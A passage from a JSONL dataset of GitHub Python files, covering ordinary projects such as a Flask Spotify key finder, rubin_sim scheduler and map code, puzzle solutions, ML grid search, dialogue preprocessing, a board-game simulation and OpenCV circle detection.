end='')\nfor i in range(10):\n print(' [{0}]'.format(i), end='')\nprint()\nfor i in range(10):\n print('予測[{0}]'.format(i), end='')\n for j in range(10):\n print('{0:6d}'.format(count[i][j]), end='')\n print()\nprint('正解率:', score*100/BATCH/TEST, '%')\n","repo_name":"uni51/understand_python","sub_path":"sample/chapter12/dl_test.py","file_name":"dl_test.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73722629546","text":"from flask import Flask, render_template, url_for\nfrom SpotifyAPIManager import Spotify\nfrom spotipy.cache_handler import CacheFileHandler\nimport json\nimport os\n\napp = Flask(__name__)\nspotifyManager = Spotify()\n\n\n@app.route('/')\ndef login():\n return render_template('login.html')\n\n\n@app.route('/currentSong')\ndef main():\n if os.path.exists(\".cache\"):\n delete_cache()\n else:\n spotifyManager.login()\n cacheHandler = CacheFileHandler()\n with open('cache.json', 'w+') as json_file:\n json.dump(cacheHandler.get_cached_token(), json_file, indent=4)\n data = spotifyManager.currentSong('tonal_information.json')\n print(data)\n\n key_info = \"\"\"Key: {} {}\"\"\".format(data['key'], data['mode'])\n\n tempo = \"Tempo: {}\".format(data['tempo'])\n\n spotifyManager.download_cover(data['cover_url'])\n print(data['cover_url'])\n\n try:\n delete_cache()\n except:\n print(\"ERROR: No cache file found\")\n finally:\n return render_template('current_song.html', name=data['song'], artist=data['artist'], info=key_info, tempo=tempo)\n\ndef delete_cache():\n file = '.cache'\n path = os.path.join(os.getcwd(), file)\n os.remove(path)\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"eren-darici/spotify-keyfinder","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12914489131","text":"from cryptofeed import FeedHandler\nfrom cryptofeed.callback import BookCallback, TickerCallback, 
TradeCallback\nfrom cryptofeed.defines import BID, ASK, FUNDING, L2_BOOK, OPEN_INTEREST, TICKER, TRADES\nfrom cryptofeed.exchanges import Deribit\n\n\nasync def trade(feed, symbol, order_id, timestamp, side, amount, price, receipt_timestamp):\n print(f\"Timestamp: {timestamp} Feed: {feed} Pair: {symbol} ID: {order_id} Side: {side} Amount: {amount} Price: {price}\")\n\n\nasync def ticker(feed, symbol, bid, ask, timestamp, receipt_timestamp):\n print(f'Feed: {feed} Pair: {symbol} Bid: {bid} Ask: {ask}')\n\n\nasync def book(feed, symbol, book, timestamp, receipt_timestamp):\n print(f'Timestamp: {timestamp} Feed: {feed} Pair: {symbol} Book Bid Size is {len(book[BID])} Ask Size is {len(book[ASK])}')\n\n\nasync def funding(**kwargs):\n print(f'Funding {kwargs}')\n\n\nasync def oi(feed, symbol, open_interest, timestamp, receipt_timestamp):\n print(f'Timestamp: {timestamp} Feed: {feed} Pair: {symbol} open interest: {open_interest}')\n\n\ndef main():\n f = FeedHandler()\n\n # Deribit can't handle 400+ simultaneous requests, so if all\n # instruments are needed they should be fed in the different calls\n\n sub = {TRADES: [\"BTC-PERPETUAL\"], TICKER: ['ETH-PERPETUAL'], FUNDING: ['ETH-PERPETUAL'], OPEN_INTEREST: ['ETH-PERPETUAL']}\n f.add_feed(Deribit(subscription=sub, callbacks={OPEN_INTEREST: oi, FUNDING: funding, TICKER: TickerCallback(ticker), TRADES: TradeCallback(trade)}))\n f.add_feed(Deribit(symbols=['BTC-PERPETUAL'], channels=[L2_BOOK], callbacks={L2_BOOK: BookCallback(book)}))\n\n f.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Quirky-Fox/cryptofeed-old","sub_path":"examples/demo_deribit.py","file_name":"demo_deribit.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"25725062776","text":"class Mobile ():\n def __init__(self,m,p):\n self.model = m\n self.price = p\n def show_Details(self):\n print(f\"Model: {self.model}\")\n print(\"Price: {}\".format(self.price))\n\ndef details ():\n Model = input(\"Enter model name: \")\n Price = int(input(\"Enter price: \"))\n return Model , Price\n\nprint(\"Details of RealMe Mobile\")\nm , p = details()\nrealme = Mobile(m,p)\nrealme.show_Details()\nprint(id(realme))\nprint()\n\nprint(\"Details of Redmi Mobile\")\nm, p = details()\nredmi = Mobile(m , p )\nredmi.show_Details()\nprint(id(redmi))\n","repo_name":"ankit-0044/Python","sub_path":"Python/Random Codes/Mobile_class.py","file_name":"Mobile_class.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4137500643","text":"import unittest\nimport os\nfrom os import listdir, path\nfrom pathlib import Path\n\n\nclass TestCensor(unittest.TestCase):\n\n def test_get_inputs(self, dir = Path('Podcast_Censor\\Test_Files\\Test_Input'), f = 'audio_test.mp3'):\n from convert_to_wav import get_inputs\n inputs = get_inputs(dir)\n self.assertTrue(f in inputs)\n \n def test_mp3_to_wav(self, f = \"audio_test.mp3\"):\n from convert_to_wav import mp3_to_wav\n dest_dir = Path('Podcast_Censor/Test_Files/Test_Intermediate')\n in_file = Path('Podcast_Censor/Test_Files/Test_Input/') / f\n mp3_to_wav(in_file, dest_dir)\n f = dest_dir / (in_file.stem + '.wav')\n self.assertTrue(os.path.isfile(f))\n if os.path.exists(f):\n os.remove(f)\n\n def test_convert_files_to_wav(self):\n from convert_to_wav import convert_files_to_wav\n in_dir = Path('Podcast_Censor/Test_Files/Test_Input')\n out_dir = 
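The Deribit demo above splits its subscriptions across two `add_feed` calls because, per its comment, the exchange cannot handle 400+ simultaneous requests. A generic batching helper for that situation; the instrument names and the batch size of 400 are illustrative assumptions:

```python
def chunked(items, size):
    """Yield successive `size`-length slices of `items`, e.g. to spread a
    large instrument list over several feed subscriptions."""
    for i in range(0, len(items), size):
        yield items[i:i + size]

instruments = [f"INSTR-{n}" for n in range(1000)]
for batch in chunked(instruments, 400):
    print(len(batch))  # one add_feed(...) call per batch in a real handler
```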
Path('Podcast_Censor/Test_Files/Test_Intermediate')\n convert_files_to_wav(in_dir,out_dir)\n \n inputs = [f[0:-4] + '.wav' for f in listdir(in_dir) if path.isfile(in_dir / f)]\n out = [f for f in listdir(out_dir) if path.isfile(out_dir / f)]\n self.assertEqual(inputs, out)\n for f in out:\n if os.path.exists(f):\n os.remove(f)\n \n def test_create_decoder():\n from create_transcript import create_decoder\n decoder = create_decoder()\n \n\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"micah-rufsvold/hottinruf","sub_path":"Podcast_Censor/censor_tests.py","file_name":"censor_tests.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"780724967","text":"__all__ = (\"VaryExptDetailer\", \"calc_target_m5s\")\n\nimport healpy as hp\nimport numpy as np\n\nfrom rubin_sim.scheduler.detailers import BaseDetailer\nfrom rubin_sim.utils import m5_flat_sed, ra_dec2_hpid\n\n\ndef calc_target_m5s(alt=65.0, fiducial_seeing=0.9, exptime=20.0):\n \"\"\"Use the skybrightness model to find some good target m5s.\n\n Parameters\n ----------\n alt : `float`, opt\n Altitude for the target, degrees. Default 65.\n fiducial_seeing : `float`, opt\n Fiducial FWHMeff seeing, arcseconds. Default 0.9.\n exptime : `float`, opt\n Exposure time for the comparison, seconds. Default 20.\n\n Returns\n -------\n goal_m5 : `dict` of `float`\n dictionary of expected m5 values keyed by filtername\n \"\"\"\n import rubin_sim.skybrightness as sb\n\n sm = sb.SkyModel(moon=False, twilight=False, mags=True)\n sm.set_ra_dec_mjd(np.array([0.0]), np.array([alt]), 49353.177645, degrees=True, azAlt=True)\n sky_mags = sm.return_mags()\n airmass = 1.0 / np.cos(np.pi / 2.0 - np.radians(alt))\n\n goal_m5 = {}\n for filtername in sky_mags:\n goal_m5[filtername] = m5_flat_sed(filtername, sky_mags[filtername], fiducial_seeing, exptime, airmass)\n\n return goal_m5\n\n\nclass VaryExptDetailer(BaseDetailer):\n \"\"\"Vary the exposure time on observations to try and keep each observation at uniform depth.\n\n Parameters\n ----------\n min_expt : `float` (20.)\n The minimum exposure time to use (seconds).\n max_expt : `float` (100.)\n The maximum exposure time to use\n target_m5 : `dict` (None)\n Dictionary with keys of filternames as str and target 5-sigma depth values as floats.\n If none, the target_m5s are set to a min_expt exposure at X=1.1 in dark time.\n\n \"\"\"\n\n def __init__(self, nside=32, min_expt=20.0, max_expt=100.0, target_m5=None):\n \"\"\"\"\"\"\n # Dict to hold all the features we want to track\n self.survey_features = {}\n self.nside = nside\n self.min_exp = min_expt\n self.max_exp = max_expt\n if target_m5 is None:\n self.target_m5 = {\n \"g\": 24.381615425253738,\n \"i\": 23.41810142458083,\n \"r\": 23.964359143049755,\n \"u\": 22.978794343692783,\n \"y\": 21.755612950787068,\n \"z\": 22.80377793629767,\n }\n else:\n self.target_m5 = target_m5\n\n def __call__(self, observation_list, conditions):\n \"\"\"\n Parameters\n ----------\n observation_list : `list` of observations\n The observations to detail.\n conditions : `rubin_sim.scheduler.conditions` object\n\n Returns\n -------\n List of observations.\n \"\"\"\n obs_array = np.concatenate(observation_list)\n hpids = ra_dec2_hpid(self.nside, obs_array[\"RA\"], obs_array[\"dec\"])\n new_expts = np.zeros(obs_array.size, dtype=float)\n for filtername in np.unique(obs_array[\"filter\"]):\n in_filt = np.where(obs_array[\"filter\"] == filtername)\n delta_m5 = 
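Two notes on the records above. In the censor tests, `test_create_decoder` is declared without `self`, so unittest would raise a TypeError when invoking it. Separately, `calc_target_m5s` converts altitude to airmass with the plane-parallel (secant of zenith angle) approximation; a standalone check of that one line, using an assumed altitude of 65 degrees:

```python
import numpy as np

def airmass_from_altitude(alt_deg):
    """Plane-parallel atmosphere: airmass = sec(zenith angle)."""
    zenith = np.pi / 2.0 - np.radians(alt_deg)
    return 1.0 / np.cos(zenith)

print(round(airmass_from_altitude(65.0), 3))  # ~1.103
```

The secant form diverges near the horizon, but the function's default altitude of 65 degrees is well away from that regime.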
self.target_m5[filtername] - conditions.M5Depth[filtername][hpids[in_filt]]\n # We can get NaNs because dithering pushes the center of the pointing into masked regions.\n nan_indices = np.argwhere(np.isnan(delta_m5)).ravel()\n for indx in nan_indices:\n bad_hp = hpids[in_filt][indx]\n # Note this might fail if we run at higher resolution, then we'd need to look farther for\n # pixels to interpolate.\n near_pix = hp.get_all_neighbours(conditions.nside, bad_hp)\n vals = conditions.M5Depth[filtername][near_pix]\n if True in np.isfinite(vals):\n estimate_m5 = np.mean(vals[np.isfinite(vals)])\n delta_m5[indx] = self.target_m5[filtername] - estimate_m5\n else:\n raise ValueError(\"Failed to find a nearby unmasked sky value.\")\n\n new_expts[in_filt] = conditions.exptime * 10 ** (delta_m5 / 1.25)\n new_expts = np.clip(new_expts, self.min_exp, self.max_exp)\n # I'm not sure what level of precision we can expect, so let's just limit to seconds\n new_expts = np.round(new_expts)\n\n for i, observation in enumerate(observation_list):\n observation[\"exptime\"] = new_expts[i]\n\n return observation_list\n","repo_name":"lsst/rubin_sim","sub_path":"rubin_sim/scheduler/detailers/vary_exptime.py","file_name":"vary_exptime.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"37"} +{"seq_id":"42868096432","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/154538\n\nfrom collections import deque\n\ndef solution(x, y, n):\n stack = deque([[y, 0]])\n while stack:\n y, cnt = stack.popleft()\n \n if y == x:\n return cnt\n if y < x:\n continue\n\n if y % 2 == 0:\n stack.append([y/2, cnt+1])\n if y % 3 == 0:\n stack.append([y/3, cnt+1])\n \n stack.append([y-n, cnt+1])\n\n return -1\n","repo_name":"yongsun-yoon/python-algorithms","sub_path":"programmers/154548.py","file_name":"154548.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22367246072","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu 4 Aug 2023 19:15:00 CEST\n\n@author: Gloria del Valle\n\"\"\"\nfrom sklearn.model_selection import GridSearchCV\nimport warnings\n\n# Suppress a specific warning\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\n\n# Define hyperparameter grid\nparam_grid = {\n \"n_estimators\": [100, 200, 300],\n \"max_depth\": [3, 4, 5, 20],\n \"learning_rate\": [0.1, 0.01, 0.001],\n \"max_features\": [\"auto\", \"sqrt\"],\n}\n\n\nclass GridSearch:\n \"\"\"\n Perform grid search with a determined model\n \"\"\"\n\n def __init__(self, data_loader, model):\n \"\"\"\n Initialize GridSearch class\n \"\"\"\n self.data_loader = data_loader\n self.model = model\n\n def grid_search(self):\n \"\"\"\n Perform grid search with a determined model\n\n Returns:\n y_pred: predictions on the test set\n \"\"\"\n\n # Get the valid hyperparameters for Random Forest\n valid_params = [\n param for param in param_grid if param in self.model.get_params()\n ]\n\n # Filter the parameter grid to include only valid parameters\n valid_param_grid = {param: param_grid[param] for param in valid_params}\n\n # Initialize GridSearchCV\n grid_search = GridSearchCV(self.model, valid_param_grid, cv=3, n_jobs=-1)\n\n # Perform grid search\n grid_search.fit(self.data_loader.X_train, self.data_loader.y_train)\n\n # Get the best model\n best_model = grid_search.best_estimator_\n\n # Make predictions on the test set\n y_pred = 
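`VaryExptDetailer` rescales exposure time via `10 ** (delta_m5 / 1.25)`, i.e. it inverts the usual depth-versus-time relation delta_m5 = 1.25 * log10(t_new / t_old). A self-contained sketch of that scaling, with the class's default clipping bounds:

```python
def scale_exptime(exptime, delta_m5, min_exp=20.0, max_exp=100.0):
    """Exposure time needed to recover a depth shortfall of delta_m5
    magnitudes, clipped to the allowed range."""
    t_new = exptime * 10 ** (delta_m5 / 1.25)
    return min(max(t_new, min_exp), max_exp)

print(scale_exptime(30.0, 0.5))  # 30 * 10**0.4, roughly 75.4 s
print(scale_exptime(30.0, 2.0))  # hits the 100 s ceiling
```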
best_model.predict(self.data_loader.X_test)\n\n # Print best hyperparameters\n print(\n f\"Best hyperparameters for {self.model.__class__.__name__} model:\",\n grid_search.best_params_,\n )\n\n return y_pred\n","repo_name":"glorelvalle/cc-fraud-detection","sub_path":"models/grid_search.py","file_name":"grid_search.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20806099025","text":"import csv\nfrom copy import copy\n\nwith open ('AoC21/data/AoC_3_1_2021.csv') as file:\n reader = csv.reader(file)\n data = list(reader)\n\ndata_clean = [item for sublist in data for item in sublist]\n\ngamma = ''\nepsilon = ''\n\nfor item in range(0, len(data_clean[0])):\n one = 0\n zero = 0\n for i in range(len(data_clean)):\n if data_clean[i][item] == '0':\n zero += 1\n else:\n one += 1\n if zero > one:\n gamma += '0'\n epsilon += '1'\n else:\n gamma += '1'\n epsilon += '0'\n\ng = int(gamma, 2)\ne = int(epsilon, 2)\n\nprint(f'result part 1: {g*e}')\n\noxygen_diagnostic = copy(data_clean)\n\nindex = 0\nwhile len(oxygen_diagnostic) > 1:\n zero = 0\n one = 0\n zero_list = []\n one_list = []\n for i in range(0, len(oxygen_diagnostic)):\n if oxygen_diagnostic[i][index] == '0':\n zero += 1\n zero_list.append(oxygen_diagnostic[i])\n else:\n one += 1\n one_list.append(oxygen_diagnostic[i])\n\n if one >= zero:\n oxygen_diagnostic = one_list\n else:\n oxygen_diagnostic = zero_list\n index += 1\n\noxygen = int(oxygen_diagnostic[0],2)\n\nco2_diagnostic = copy(data_clean)\n\nindex = 0\nwhile len(co2_diagnostic) > 1:\n zero = 0\n one = 0\n zero_list = []\n one_list = []\n for i in range(0, len(co2_diagnostic)):\n if co2_diagnostic[i][index] == '0':\n zero += 1\n zero_list.append(co2_diagnostic[i])\n else:\n one += 1\n one_list.append(co2_diagnostic[i])\n\n if one < zero:\n co2_diagnostic = one_list\n else:\n co2_diagnostic = zero_list\n index += 1\n\nco2 = int(co2_diagnostic[0],2)\n\nprint(f'result part 2: {oxygen * co2}')\n","repo_name":"Daniel-Lars/AoC21","sub_path":"AoC21/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24359933511","text":"ss = input(\"\")\nt1 = input(\"\")\nx = 0\nR=\"\"\nR1 = ''\nfor i in ss:\n if(i in t1[x:]):\n R = R+i\n x = t1.index(i)+1\nx = 0\nfor i in t1:\n if(i in ss[x:]):\n R1 = R1+i\n x = ss.index(i)+1\nif(len(R)>= len(R1)):\n print(R)\nelse:\n print(R1)\n","repo_name":"balajimanikandanm/python3","sub_path":"Hun112.py","file_name":"Hun112.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"780270357","text":"__all__ = (\"TrilegalDensityMap\",)\n\nimport os\n\nimport healpy as hp\nimport numpy as np\n\nfrom rubin_sim.data import get_data_dir\nfrom rubin_sim.utils import _build_tree, _equatorial_from_galactic, _hpid2_ra_dec, _xyz_from_ra_dec\n\nfrom . import BaseMap\n\n\nclass TrilegalDensityMap(BaseMap):\n \"\"\"\n Return the cumulative stellar luminosity function for each slice_point. Units of stars per sq degree.\n\n Parameters\n ----------\n filtername : `str`, opt\n Filter to use. Options of u,g,r,i,z,y. Default r.\n nside : `int`, opt\n The HEALpix nside (can be 64 or 128). Default 64.\n ext : `bool`, opt\n Use the full sky maps. 
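The Advent of Code day-3 record computes gamma and epsilon one column at a time with explicit counters. An equivalent sketch condensed around the per-column majority test (the sample report is a shortened version of the puzzle's published example):

```python
def gamma_epsilon(report):
    """Most/least common bit per column of equal-length binary strings;
    a tie counts as '1' for gamma."""
    width = len(report[0])
    gamma = "".join(
        "1" if 2 * sum(row[i] == "1" for row in report) >= len(report) else "0"
        for i in range(width)
    )
    epsilon = "".join("1" if b == "0" else "0" for b in gamma)
    return int(gamma, 2), int(epsilon, 2)

g, e = gamma_epsilon(["00100", "11110", "10110", "10111", "10101"])
print(g * e)  # power consumption = gamma * epsilon
```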
Default True.\n \"\"\"\n\n def __init__(self, filtername=\"r\", nside=64, ext=True):\n self.map_dir = os.path.join(get_data_dir(), \"maps\", \"TriMaps\")\n self.filtername = filtername\n self.keynames = [\n f\"starLumFunc_{self.filtername}\",\n f\"starMapBins_{self.filtername}\",\n ]\n self.nside = nside\n self.ext = ext\n\n def _read_map(self):\n if self.ext:\n filename = \"TRIstarDensity_%s_nside_%i_ext.npz\" % (\n self.filtername,\n self.nside,\n )\n else:\n filename = \"TRIstarDensity_%s_nside_%i.npz\" % (self.filtername, self.nside)\n star_map = np.load(os.path.join(self.map_dir, filename))\n self.star_map = star_map[\"starDensity\"].copy()\n self.star_map_bins = star_map[\"bins\"].copy()\n self.starmap_nside = hp.npix2nside(np.size(self.star_map[:, 0]))\n # note, the trilegal maps are in galactic coordinates, and nested healpix.\n gal_l, gal_b = _hpid2_ra_dec(self.nside, np.arange(hp.nside2npix(self.nside)), nest=True)\n\n # Convert that to RA,dec. Then do nearest neighbor lookup.\n ra, dec = _equatorial_from_galactic(gal_l, gal_b)\n self.tree = _build_tree(ra, dec)\n\n def run(self, slice_points):\n self._read_map()\n\n x, y, z = _xyz_from_ra_dec(slice_points[\"ra\"], slice_points[\"dec\"])\n\n dist, indices = self.tree.query(list(zip(x, y, z)))\n\n slice_points[\"starLumFunc_%s\" % self.filtername] = self.star_map[indices, :]\n slice_points[\"starMapBins_%s\" % self.filtername] = self.star_map_bins\n return slice_points\n","repo_name":"lsst/rubin_sim","sub_path":"rubin_sim/maf/maps/trilegal_map.py","file_name":"trilegal_map.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"37"} +{"seq_id":"6566621685","text":"from typing import List, Dict\n\nimport pandas as pd\n\nfrom .clean_spoken import clean_spoken\nfrom .group_dialogue import group_dialogue\nfrom .check_role import fix_role\nfrom .restore_punctuation import restore_punc\nfrom ..model_manager import get_spacy_model\nfrom ..util import Utterance, init_from_str_dialogue\n\n\ndef statistic_each_dialogue(dialogue: str, task: str):\n \"\"\"\n Describe a dialogue based on:\n - Total length in word; sentence; uterance\n - uterances/role\n - words/uterance/role; sentences/uterance/role\n - NER/uterance/role\n \"\"\"\n figures = {}\n uterances = init_from_str_dialogue(dialogue, task=task)\n figures['Dialogue length in uterance'] = len(uterances)\n figures['Dialogue length in word'] = sum([len(each.spacy_doc) for each in uterances])\n figures['Dialogue length in sentence'] = sum([len(list(each.spacy_doc.sents)) for each in uterances])\n to_merge_figures = {}\n roles = {}\n for each in uterances:\n if each.role not in roles:\n roles[each.role] = 1\n else:\n roles[each.role] += 1\n if f'Uterance length in word of {each.role}' not in to_merge_figures:\n to_merge_figures[f'Uterance length in word of {each.role}'] = []\n to_merge_figures[f'Uterance length in word of {each.role}'].append(len(each.spacy_doc))\n if f'Uterance length in sentence of {each.role}' not in to_merge_figures:\n to_merge_figures[f'Uterance length in sentence of {each.role}'] = []\n to_merge_figures[f'Uterance length in sentence of {each.role}'].append(len(list(each.spacy_doc.sents)))\n if f'Number of named entities in uterance of {each.role}' not in to_merge_figures:\n to_merge_figures[f'Number of named entities in uterance of {each.role}'] = []\n to_merge_figures[f'Number of named entities in uterance of {each.role}'].append(len(list(each.spacy_doc.ents)))\n\n for role, num in 
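`TrilegalDensityMap.run` does its spatial lookup by converting RA/Dec to unit vectors and querying a tree built by the private `_build_tree` helper. A sketch of the same idea, assuming the helper wraps something like scipy's `cKDTree`; the catalog positions here are random stand-ins:

```python
import numpy as np
from scipy.spatial import cKDTree

def xyz_from_ra_dec(ra, dec):
    """Unit vectors from RA/Dec in radians."""
    return np.cos(dec) * np.cos(ra), np.cos(dec) * np.sin(ra), np.sin(dec)

rng = np.random.default_rng(0)
cat_ra = rng.uniform(0, 2 * np.pi, 1000)
cat_dec = rng.uniform(-np.pi / 2, np.pi / 2, 1000)
tree = cKDTree(np.column_stack(xyz_from_ra_dec(cat_ra, cat_dec)))

query = np.column_stack(xyz_from_ra_dec(np.array([1.0]), np.array([0.5])))
dist, idx = tree.query(query)  # chord distance and index of nearest point
```

Querying on 3-D chord distance avoids the wrap-around problems of a naive tree built directly on RA/Dec.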
roles.items():\n figures[f'Dialogue length in uterance of {role}'] = num\n return figures, to_merge_figures, uterances\n\n\ndef describe_text(text):\n \"\"\"\n Describe a text\n \"\"\"\n nlp = get_spacy_model()\n spacy_doc = nlp(text)\n figures = {}\n figures['Number of words'] = len(spacy_doc)\n figures['Number of sentences'] = len(list(spacy_doc.sents))\n figures['Number of entities'] = len(list(spacy_doc.ents))\n to_merge = {}\n to_merge['Sentence length in word'] = [len(sent) for sent in spacy_doc.sents]\n return figures, to_merge\n\n\ndef preprocessing(dialogue_list: List[List[Utterance]],\n df: pd.DataFrame,\n dialogue_column: str,\n **kwargs) -> Dict:\n \"\"\"\n Preprocessing function.\n Receive dialogue data (raw) of a list of dialogue, this function return a tuple of pre-processed dialogue, other meta data, etc.\n \"\"\"\n assert dialogue_column in df.columns, f\"Expected column '{dialogue_column}' in the dataframe\"\n df_cleaned = clean_spoken(df, dialogue_column=dialogue_column, **kwargs)\n df_punc = restore_punc(df_cleaned, dialogue_column='clean_dialogue', **kwargs)\n df_fix_role = fix_role(df_punc, dialogue_column='restore_punctuation_dialogue', **kwargs)\n df_group = group_dialogue(df_fix_role, dialogue_column='fixed_role_dialogue', **kwargs)\n\n return {\n \"dialogue_list\": dialogue_list, \"df\": df_group\n }\n","repo_name":"catcd/MEDIQA-Sum-2023-UETCorn","sub_path":"taskC/src/preprocess/simple_processing.py","file_name":"simple_processing.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35201574853","text":"from propriedade import Propriedade\nfrom impulsivo import Impulsivo\nfrom aleatorio import Aleatorio\nfrom exigente import Exigente\nfrom cauteloso import Cauteloso\nimport random\nimport time\nfrom colorama import Fore\n\nCONTINUA_JOGO = True\nDADO = [1,2,3,4,5,6]\nLIMITE = 1000\nDEBUG = False\n\nclass Tabuleiro:\n\n def __init__(self):\n self.rodada = 0\n self.vencedor = \"Ninguem\"\n self.timeout = False\n self.propriedades = [\n Propriedade(0,0,\"Inicio\"), #0 Inicio\n Propriedade(60, 5, \"Apartamento - Ibirapuera\"), #1\n Propriedade(60, 35, \"Loja - Moema\"), #2\n Propriedade(20, 5, \"Supermercado - Brooklin\"), #3\n Propriedade(70, 15, \"Apartamento - Santo Amaro\"), #4\n Propriedade(120, 55, \"Mercearia - Socorro\"), #5\n Propriedade(90, 60, \"Pastelaria - Tatuape\"), #6\n Propriedade(60, 15, \"Loja - Penha\"), #7\n Propriedade(30, 5, \"Farmacia - Santana\"), #8\n Propriedade(230, 60, \"Hotel - Casa Verde\"), #9\n Propriedade(40, 5, \"Escola - Butantã\"), #10\n Propriedade(110, 55, \"Apartamento - Pirituba\"), #11\n Propriedade(60 , 15, \"Loja - Freguesia do O\"), #12\n Propriedade(50, 15, \"Supermercado - Lapa\"), #13\n Propriedade(130, 50, \"Apartamento - Pinheiros\"), #14\n Propriedade(60, 5 , \"Mercearia - Pompeia\"), #15\n Propriedade(30, 5, \"Hotel - Vila Madalena\"), #16\n Propriedade(85, 30, \"Loja - Santa Ifigenia\"), #17\n Propriedade(70 , 25, \"Farmacia - Anhangabau\"), #18\n Propriedade(60, 10, \"Minimercado - Liberdade\"), #19\n Propriedade(20, 5, \"Escola - Mooca\"), #20\n ]\n\n self.NUM_PROPRIEDADES = len(self.propriedades) - 1\n\n self.jogadores = [\n Impulsivo(\"João\"),\n Exigente(\"José\"),\n Cauteloso(\"Ana\"),\n Aleatorio(\"Maria\")\n ]\n\n self.JOGANDO = len(self.jogadores)\n\n def proxima_posicao(self, jogador):\n dado = random.choice(DADO)\n # se passar da ultima casa começa da primeira casa\n proxima_pos = jogador.posicao + dado\n 
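`statistic_each_dialogue` counts words, sentences, and entities per utterance through spaCy docs. A minimal reproduction of those counts that avoids downloading a model: a blank pipeline plus the rule-based `sentencizer` (so `doc.ents` stays empty, since there is no NER component):

```python
import spacy

nlp = spacy.blank("en")
nlp.add_pipe("sentencizer")

doc = nlp("Hello there. How are you today?")
stats = {
    "words": len(doc),               # token count, punctuation included
    "sentences": len(list(doc.sents)),
    "entities": len(doc.ents),       # 0 here: blank pipeline has no NER
}
print(stats)  # {'words': 8, 'sentences': 2, 'entities': 0}
```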
if proxima_pos > self.NUM_PROPRIEDADES:\n # ao completar uma volta o jogador ganha 100\n jogador.saldo += 100\n return proxima_pos - self.NUM_PROPRIEDADES\n else:\n return proxima_pos\n\n def perde_propriedades(self, jogador):\n for propriedade in self.propriedades:\n if propriedade.dono == jogador:\n propriedade.retira_dono()\n\n def exclui_jogador(self,jogador):\n jogador.jogando = False\n self.JOGANDO -= 1\n self.perde_propriedades(jogador)\n if DEBUG:\n print(f\"{Fore.RED} ** Jogador {jogador.nome} excluido {Fore.RESET}\")\n\n def acha_vencedor(self):\n maior_saldo = 0\n for jogador in self.jogadores:\n if jogador.jogando:\n if jogador.saldo > maior_saldo:\n maior_saldo = jogador.saldo\n self.vencedor = jogador\n\n def partida(self):\n random.shuffle(self.jogadores)\n while self.JOGANDO > 1:\n for jogador in self.jogadores:\n if jogador.jogando:\n jogador.posicao = self.proxima_posicao(jogador)\n # Decide o que o jogador vai fazer nessa propriedade\n propriedade = self.propriedades[jogador.posicao]\n if DEBUG:\n print(f\"Rodada {self.rodada} - Jogando {jogador.nome}, Saldo: {jogador.saldo} - Caiu na propriedade de {(propriedade.dono).nome} - Valor:{propriedade.venda}, Aluguel:{propriedade.aluguel}\")\n jogador.acao(propriedade)\n # Exclui jogadores sem dinheiro\n if jogador.saldo < 0:\n self.exclui_jogador(jogador)\n #time.sleep(0.1)\n self.rodada += 1\n if self.rodada > LIMITE:\n self.rodada -= 1\n self.timeout = True\n self.JOGANDO = 0\n break\n\n self.acha_vencedor()","repo_name":"atersistemas/Banco_Prev","sub_path":"tabuleiro.py","file_name":"tabuleiro.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17541942896","text":"# coding=utf-8\n'''\n全部帧 crop圆圈区域 然后对齐 通道上堆叠起来\n然后所有通道上对每个pixel位置求均值 方差之类的统计量\n以上, 就处理变成了新的图\n\n'''\n\nimport os\nimport cv2\nimport json\nfrom pattern_find_center import get_min_apple_pattern\n\n\n\ndef locate_circle(auged):\n gray_auged = auged[:,:,0]\n try:\n circles = cv2.HoughCircles(gray_auged,cv2.HOUGH_GRADIENT,1,100,param1=60,param2=50,minRadius=320,maxRadius=400)[0]\n except:\n return None, None, 0\n \n # 检出太多的圆也是不对的, 可能因为图像中的\"雪花点\"导致\n if len(circles) >= 3:\n return None, None, 0\n else:\n for circle in circles:\n circle = [int(a) for a in circle]\n \n # cv2.circle(auged,(circle[0],circle[1]),circle[2],(0,255,0),2)\n\n return auged, circles, 1\n\n\ndef video_2_frams(full_video_path, out_dir_path, train_frames, auged_or_org):\n # auged_or_org = True, auged后的图像做霍夫圆检测\n # False, 原视频帧做霍夫圆检测\n # video_path, video = '/Users/chenjia/Downloads/Smartmore/2022/比赛-工业表面缺陷检测/mp4s', '001.mp4'\n video = os.path.basename(full_video_path)\n frame_circle = dict()\n times = 0\n frame_frequency = 1\n # full_video_path = os.path.join(video_path, video)\n print(full_video_path)\n camera = 